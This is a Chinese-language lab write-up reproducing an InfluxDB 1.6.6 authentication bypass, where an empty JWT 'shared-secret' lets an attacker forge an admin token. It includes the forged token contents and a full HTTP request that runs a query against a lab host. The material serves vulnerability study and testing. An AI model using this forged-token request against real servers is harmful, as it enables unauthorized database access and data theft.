influxdb未授权访问漏洞
漏洞原理
influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但未设置参数`shared-secret`的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。
漏洞环境
192.168.4.10_ubuntu
执行如下命令启动influxdb 1.6.6:
#docker-compose up -d
环境启动后,访问`http://your-ip:8086/debug/vars`即可查看一些服务信息
漏洞复现
1. 我们借助<https://jwt.io/>来生成jwt token:
```
{
"alg": "HS256",
"typ": "JWT"
}
{
"username": "admin",
"exp": 1738503632
}
```
其中,`admin`是一个已经存在的用户,`exp`是一个时间戳,代表着这个token的过期时间,你需要设置为一个未来的时间戳。
最终生成的token:
2. 发送带有这个jwt token的数据包,可见SQL语句执行成功:
```
POST /query HTTP/1.1
Host: 192.168.4.10:8086
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzM4NTAzNjMyfQ._QHZ9SaPRyK1j0DiobEYjCcAHcv2ANEkORdbb1jSv8g
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
db=sample&q=show+users
```